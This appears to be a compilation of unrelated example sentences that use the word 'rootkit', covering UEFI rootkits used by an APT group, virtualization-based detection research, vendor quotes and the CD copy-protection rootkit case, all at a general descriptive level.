"Although, in theory we were aware that UEFI
rootkits existed, our discovery confirms they are used by an active APT group.
In recent years, researchers change the
rootkit defense landscape by leveraging recent advances of virtualization, and propose virtual machine introspection technology to build IDSes [10] [12] [13].
Recent researches are showing that seven of the top ten threats in 2012 were
rootkits and that the number of boot-level
rootkits increased dramatically,” said Avishai Ziv, vice president of Cyber Security Solutions at LynuxWorks.
Depending on the level of exploitation, a
rootkit can operate in the user space and the kernel space.
The
rootkit used was designed specifically to exploit these three features but, according to Vinod Ganapathy and Liviu Iftode, two of the scientists who helped to develop it, this is just the tip of the iceberg.
The only reliable way to cure a
rootkit infection is to re-install the operating system and applications.
Rootkit Detective was developed by Avert(R) Labs, McAfee's top-ranked global security threat and research organization.
Rootkits are malware designed to hide themselves in another application or operating system.
With a
rootkit, that command can be intercepted and false information returned.
Some days later, during a routine security check on his machine, he found something odd: a bunch of files he identified as a "
rootkit".
The technology, which was designed to replace music with static should a user attempt to illegally copy the CD, was also found to secretly install a "
rootkit" on PC users' computers (a program frequently used by hackers to gain access to and control a computer system without the user's knowledge).